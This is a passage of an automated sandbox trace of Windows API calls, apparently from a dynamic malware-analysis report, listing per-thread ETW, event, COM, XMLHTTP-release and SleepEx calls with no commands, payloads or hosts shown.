	[0059.790] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18ea60*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18ea60*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.790] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e990*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e990*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x6, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.790] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18ea60*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x7, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18ea60*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x7, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0059.790] SetEvent (hEvent=0x5c4) returned 1
	[0059.790] SetEvent (hEvent=0x5ec) returned 1
	[0059.790] SetEvent (hEvent=0x5e8) returned 1
	[0059.790] SetEvent (hEvent=0x5cc) returned 1
	[0059.790] SetEvent (hEvent=0x5f4) returned 1
	[0059.790] SetEvent (hEvent=0x5f0) returned 1
	[0059.790] SetEvent (hEvent=0x5d8) returned 1
	[0059.790] SetEvent (hEvent=0x5d4) returned 1
	[0059.791] SetEvent (hEvent=0x5e0) returned 1
	[0059.792] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18ea80*=0x5d0, lpdwindex=0x184c18e854 | out: lpdwindex=0x184c18e854) returned 0x0
	[0059.792] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0060.615] CoCreateGuid (in: pguid=0x184c18e928 | out: pguid=0x184c18e928*(Data1=0x5033d26c, Data2=0xae88, Data3=0x47b5, Data4=([0]=0x9c, [1]=0x6f, [2]=0x25, [3]=0x7e, [4]=0x50, [5]=0xfb, [6]=0xf1, [7]=0x1f))) returned 0x0
	[0060.618] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18ea48*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18ea48*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x71, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0060.618] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e950*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e950*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x7, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0060.618] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18ea28*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x71, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18ea28*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x71, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0060.922] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x184c18e0d0*=0xa34, lpdwindex=0x184c18dec4 | out: lpdwindex=0x184c18dec4) returned 0x0
	[0060.922] SetEvent (hEvent=0xa2c) returned 1
	[0060.922] SetEvent (hEvent=0xa34) returned 1
	[0060.922] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18e990*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18e990*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x71, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0060.922] SetEvent (hEvent=0xa4c) returned 1
	[0060.922] SetEvent (hEvent=0xa2c) returned 1
	[0060.922] SetEvent (hEvent=0xa34) returned 1
	[0060.922] SetEvent (hEvent=0xa58) returned 1
	[0060.922] SetEvent (hEvent=0xa48) returned 1
	[0060.923] SetEvent (hEvent=0xa50) returned 1
	[0060.923] SetEvent (hEvent=0xa54) returned 1
	[0060.923] SetEvent (hEvent=0xa5c) returned 1
	[0060.925] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18ea80*=0x5d0, lpdwindex=0x184c18e854 | out: lpdwindex=0x184c18e854) returned 0x0
	[0060.926] CoGetContextToken (in: pToken=0x184c18d1f0 | out: pToken=0x184c18d1f0) returned 0x0
	[0060.926] CoGetContextToken (in: pToken=0x184c18d1c0 | out: pToken=0x184c18d1c0) returned 0x0
	[0060.926] CoGetContextToken (in: pToken=0x184c18d0c0 | out: pToken=0x184c18d0c0) returned 0x0
	[0060.927] XMLHTTP:IUnknown:Release (This=0x1505fc21fe8) returned 0x2
	[0060.927] XMLHTTP:IUnknown:Release (This=0x1505fc21fe8) returned 0x1
	[0060.927] CoGetContextToken (in: pToken=0x184c18d0c0 | out: pToken=0x184c18d0c0) returned 0x0
	[0060.927] XMLHTTP:IUnknown:Release (This=0x1505fc6d4f8) returned 0x2
	[0060.927] XMLHTTP:IUnknown:Release (This=0x1505fc6d4f8) returned 0x1
	[0061.099] CoGetContextToken (in: pToken=0x184c18f330 | out: pToken=0x184c18f330) returned 0x0
	[0061.099] CoGetContextToken (in: pToken=0x184c18e970 | out: pToken=0x184c18e970) returned 0x0
	[0061.099] CoGetContextToken (in: pToken=0x184c18e870 | out: pToken=0x184c18e870) returned 0x0
	[0061.099] XMLHTTP:IUnknown:Release (This=0x150600057f0) returned 0x1
	[0061.099] XMLHTTP:IUnknown:Release (This=0x150600057b0) returned 0x0
	[0061.101] IUnknown:Release (This=0x15045551c70) returned 0x0
	[0061.101] CoUninitialize () 
	[0061.110] GenericStreamBase<IStream>::Read () returned 0x0
	[0061.110] GenericStreamBase<IStream>::Read () returned 0x0
	[0061.110] GenericStreamBase<IStream>::Read () returned 0x0

Thread:
	id = 27
	os_tid = 0x2dc


Thread:
	id = 28
	os_tid = 0xa8c


Thread:
	id = 29
	os_tid = 0xf50


Thread:
	id = 30
	os_tid = 0xb6c

	[0046.129] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0046.129] CoGetContextToken (in: pToken=0x184c38f560 | out: pToken=0x184c38f560) returned 0x0
	[0046.129] CObjectContext::QueryInterface () returned 0x0
	[0046.129] CObjectContext::GetCurrentThreadType () returned 0x0
	[0046.130] Release () returned 0x0
	[0046.130] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
	[0046.130] CoUninitialize () 
	[0046.130] RoInitialize () returned 0x1
	[0046.130] RoUninitialize () returned 0x0
	[0046.131] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.147] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.159] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.210] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.288] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.325] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.400] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.434] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.484] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.542] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.579] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.638] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.655] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.677] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.719] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.804] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.810] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.857] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.864] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.901] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0046.955] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.026] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.043] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.060] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.087] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.134] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.171] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.435] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0047.848] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.141] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.205] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.266] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.397] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.446] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.536] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.620] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.830] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.877] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.922] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0048.962] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0049.994] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.005] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.048] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.131] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.158] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.240] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.266] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.346] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.383] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.434] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.751] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.860] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.895] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.151] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.297] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.324] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.393] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.466] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.750] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.835] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.843] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.859] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.861] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.863] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.872] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.879] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.911] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.930] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.261] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.284] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.337] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.353] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.387] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.390] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.401] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.438] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.672] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.874] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.875] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.879] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.889] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.910] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.942] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.949] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0052.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.011] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.051] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.104] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.121] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.172] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.193] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.226] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.228] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.280] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0053.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.444] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.456] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.484] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.530] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.530] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.563] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.680] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.716] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.750] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.824] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.838] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.839] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.869] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.951] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.989] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.012] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.030] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.106] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.127] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.198] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.199] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.215] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.225] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.231] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.232] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.234] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.235] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.236] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.237] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.273] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.289] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.292] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.312] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.336] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.360] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.396] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.439] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.793] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0059.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0060.656] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0060.935] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0061.133] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0061.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0061.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) 

Thread:
	id = 31
	os_tid = 0xb70


Thread:
	id = 32
	os_tid = 0xec0


Thread:
	id = 33
	os_tid = 0xed4

	[0050.115] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0050.115] CoGetContextToken (in: pToken=0x184c44f940 | out: pToken=0x184c44f940) returned 0x0
	[0050.115] CObjectContext::QueryInterface () returned 0x0
	[0050.115] CObjectContext::GetCurrentThreadType () returned 0x0
	[0050.115] Release () returned 0x0
	[0050.115] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1
	[0050.115] CoUninitialize () 
	[0050.115] RoInitialize () returned 0x1
	[0050.116] RoUninitialize () returned 0x0
	[0050.116] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.178] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.230] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.258] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.345] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.383] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.434] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.472] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.524] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.560] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.670] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.751] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.860] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.895] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0050.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.018] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.070] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.151] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.298] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.323] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.324] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.355] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.453] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.466] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.467] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.631] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.666] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.715] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.751] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.840] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.858] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.860] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0051.861] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.444] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.452] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.456] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
	[0058.484] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0
